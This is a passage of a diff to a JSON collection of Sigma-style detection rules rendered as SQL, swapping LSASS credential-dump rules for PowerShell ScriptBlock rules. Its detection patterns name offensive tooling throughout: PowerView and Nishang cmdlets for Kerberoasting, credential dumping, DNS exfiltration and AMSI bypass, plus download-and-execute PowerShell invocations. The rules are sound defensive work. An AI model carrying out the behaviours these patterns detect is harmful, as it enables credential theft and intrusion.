ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - 
"filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": 
"proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + 
"title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' 
ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": 
"proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - 
"description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR 